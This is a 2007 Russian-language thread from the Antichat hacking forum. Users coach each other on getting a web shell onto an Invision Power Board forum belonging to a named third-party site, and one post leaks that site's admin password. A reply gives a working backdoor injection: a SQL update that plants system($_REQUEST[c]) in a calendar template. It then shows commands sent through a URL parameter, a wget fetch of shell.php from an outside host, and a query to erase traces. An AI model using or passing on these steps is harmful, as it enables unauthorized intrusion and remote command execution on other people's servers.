ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
09.08.2007, 11:54
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от SUBJECT617
Ну тогда выходит залить шелл на этот форум нереально?
Ну тогда сами посмотрите если хотите... www.anabolex.ru/forum admin : yehakqag Буду другие форумы значит искать((
тебе БР написал выше, селект делать нужно из любой существующей таблицы форума, т.к. мускул запущен не из под рута, доступа к mysql.user нету. Но если честно, я очень сомневаюсь, что у тебя есть аутфайл-права.
|
|
|
09.08.2007, 12:55
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462
Репутация:
91
|
|
Нет, не идет, всеравно нет прав( Ни в аватарки ни из другой таблицы, да и все вместе не работает
Я уже 6 форумов нашел, проверю там, может что получится...
По крайней мере на одном было точно также, а на другом я вообще не смог зайти в админку... Были только нарисованы два квадрата и < между ними... 
Последний раз редактировалось SUBJECT617; 09.08.2007 в 13:34..
|
|
|
|
09.08.2007, 13:58
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462
Репутация:
91
|
|
Нет, я еще один способ забыл=) Через календарь, запрос прошел, а именно:
update ibf_skin_templates set func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb" where func_name="calendar_start_form";
Но я не понял что за календарь и как там вводить команды? Объясните пожалуйста, я уже близок к заливке шелла хоть?)
И еще, я так понят там надо с сайта заливать, ну так вот, сможете плз дать ссылку если у вас гдето залито а то щас с народом рабираться еще,.. 
Заранее огромное спасибо ввиде +) 
Последний раз редактировалось SUBJECT617; 09.08.2007 в 14:05..
|
|
|
|
09.08.2007, 15:00
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
Сообщение от SUBJECT617
Нет, я еще один способ забыл=) Через календарь, запрос прошел, а именно:
update ibf_skin_templates set func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb" where func_name="calendar_start_form";
Но я не понял что за календарь и как там вводить команды? Объясните пожалуйста, я уже близок к заливке шелла хоть?)
И еще, я так понят там надо с сайта заливать, ну так вот, сможете плз дать ссылку если у вас гдето залито а то щас с народом рабираться еще,..
Заранее огромное спасибо ввиде +) этот способ я и имел ввиду!
Способ здесь прокатил на ура, ссылку на шел и объяснение прислал в ПМ.
Последний раз редактировалось maxster; 09.08.2007 в 15:11..
|
|
|
|
09.08.2007, 15:18
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462
Репутация:
91
|
|
Дык я же не понял где календарь)))) А за залитие спасибо, просто сам хочу научиться)
|
|
|
|
09.08.2007, 15:35
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
Ссылка на календарь находиться в правом верхнем углу ( или по такой ссылки http://host/path_to_forum/index.php?act=calendar)
идем в админку, выбираем Управление SQL -> Средства MySQL. Внизу страницы будет поле самостоятельный запрос, туда пишем
Код:
update ibf_skin_templates set func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb" where func_name="calendar_start_form";
ibf - префикс, который может меняться
Жмем запустить запрос,если все прошло удачно видим Execute successfully( по русски не помню как будет)
Дальше идем в системные настройки -> главная конфигурация.
Там выбираем Использовать безопасный режим скинов? Да.
Идем в календарь, как туда попасть писал выше.
Что бы юзать команды, делаем так:
http://host/path_to_forum/index.php?act=calendar&c=id
Скрываем наши следы:
Для этого снимаем безопасный режим для скинов и запускаем такой запрос:
Код:
update 120_skin_templates set func_name="calendar_start_form" where func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb";
Иногда этот метод не работает! |
|
|
|
09.08.2007, 17:02
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462
Репутация:
91
|
|
http://host/path_to_forum/index.php?act=calendar&c=id А дальше писать get... где? В самой ссылке или в добавлении нового события?)
Если в ссылке то напиши ссылку пример пожалуйста...
Последний раз редактировалось SUBJECT617; 09.08.2007 в 17:10..
|
|
|
|
09.08.2007, 17:22
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
пиешь так
http://host/path_to_forum/index.php?act=calendar&c=cd uploads;wget site.ru/shell.php;ls
идешь сюда
http://host/path_to_forum/uploads/shell.php
|
|
|
|
09.08.2007, 17:48
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462
Репутация:
91
|
|
Спасибо огромное!
|
|
|
|
10.08.2007, 12:00
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462
Репутация:
91
|
|
Чтобы темы не создавать новой, есть ли команда для заливки шелла с компа а не с сайта, а то возьться с сайтом лень так..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
